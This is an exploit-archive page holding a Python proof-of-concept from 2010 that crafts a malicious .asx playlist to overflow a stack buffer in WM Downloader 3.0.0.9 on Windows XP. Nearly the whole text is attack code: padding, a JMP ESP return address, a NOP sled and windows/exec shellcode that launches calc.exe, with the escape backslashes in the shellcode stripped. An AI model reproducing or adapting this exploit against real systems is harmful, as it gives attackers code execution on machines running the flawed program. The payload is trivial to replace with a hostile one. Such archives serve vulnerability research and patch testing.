WM Downloader 3.0.0.9 (.asx) Local Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WM Downloader 3.0.0.9 (.asx) Local Buffer Overflow
# Published : 2010-03-31
# Author : b0telh0
# Previous Title : Free MP3 CD Ripper 2.6 (wav) 1day stack buffer overflow PoC exploit
# Next Title : RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)

#!/usr/bin/python
#
# Title: WM Downloader 3.0.0.9 (.asx) Local Buffer Overflow
# Date: 03-29-2010
# Author: b0telh0
# Tested on: Windows XP SP3


#
# windows/exec - 227 bytes
# EXITFUNC=process, CMD=calc.exe
#

shellcode = ("x29xc9xb1x33xdaxd3xbdx07x4ax9ex37xd9x74x24xf4"
       "x5bx83xc3x04x31x6bx0fx03x6cx45x7cxc2x8exb1x09"
       "x2dx6ex42x6axa7x8bx73xb8xd3xd8x26x0cx97x8cxca"
       "xe7xf5x24x58x85xd1x4bxe9x20x04x62xeax84x88x28"
       "x28x86x74x32x7dx68x44xfdx70x69x81xe3x7bx3bx5a"
       "x68x29xacxefx2cxf2xcdx3fx3bx4axb6x3axfbx3fx0c"
       "x44x2bxefx1bx0exd3x9bx44xafxe2x48x97x93xadxe5"
       "x6cx67x2cx2cxbdx88x1fx10x12xb7x90x9dx6axffx16"
       "x7ex19x0bx65x03x1axc8x14xdfxafxcdxbex94x08x36"
       "x3fx78xcexbdx33x35x84x9ax57xc8x49x91x63x41x6c"
       "x76xe2x11x4bx52xafxc2xf2xc3x15xa4x0bx13xf1x19"
       "xaex5fx13x4dxc8x3dx79x90x58x38xc4x92x62x43x66"
       "xfbx53xc8xe9x7cx6cx1bx4ex72x26x06xe6x1bxefxd2"
       "xbbx41x10x09xffx7fx93xb8x7fx84x8bxc8x7axc0x0b"
       "x20xf6x59xfex46xa5x5ax2bx25x28xc9xb7x84xcfx69"
       "x5dxd9");

junk = "x41" * 26112
eip = "x53x93x37x7E"        # 7E379353  USER32.dll  (JMP ESP)
nops = "x90" * 20
junk2 = "x41" * 3884

try:
    file = open('b0t.asx','w');
    file.write(junk+eip+nops+shellcode+junk2);
    file.close();
    print "n[+] b0t.asx created."
    print "[+] Open WmDownloader.exe..."
    print "[+] and load b0t.asx.n"
except:
    print "n[-] Error.. Can't write file to system.n"